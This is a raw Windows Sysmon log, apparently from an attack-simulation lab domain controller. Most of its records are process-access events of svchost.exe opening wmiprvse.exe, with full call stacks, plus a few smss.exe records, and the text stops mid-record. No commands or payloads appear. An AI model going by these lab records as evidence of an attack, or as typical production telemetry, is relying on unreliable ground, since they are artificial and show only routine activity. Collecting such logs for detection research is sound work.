13:58:14.743{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009659Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.743{59A5CD1D-8E42-6005-0200-00000000A301}448460C:\Windows\System32\smss.exe{59A5CD1D-93F6-6005-E504-00000000A301}4548C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+36ee|\SystemRoot\System32\smss.exe+3c31|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x80000000000000009658Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.746{59A5CD1D-93F6-6005-E504-00000000A301}4548C:\Windows\System32\smss.exe10.0.14393.2969 (rs1_release.190503-1820)Windows Session ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationsmss.exe\SystemRoot\System32\smss.exe 00000104 0000007c C:\Windows\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e72SystemMD5=725EC50D4B0F607BF5B45B5E0115770B,SHA256=56881BCAEAC350107A6453F38F020FE0E284DBE2E8A6F37ED482985E0DD98EA7,IMPHASH=09DDECA5943933973FE7DDDD24ED724A{59A5CD1D-8E42-6005-0200-00000000A301}448C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 10341000x80000000000000009830Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009829Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009828Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009827Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.930{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009826Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.930{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009825Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.930{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009824Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.914{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009823Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.914{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009822Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.914{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009821Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.914{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009820Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.914{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009819Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.914{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009818Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.914{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009817Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.914{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009816Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.914{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009815Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.899{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009814Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.899{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009813Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.899{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009812Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009811Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009810Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009809Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009808Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 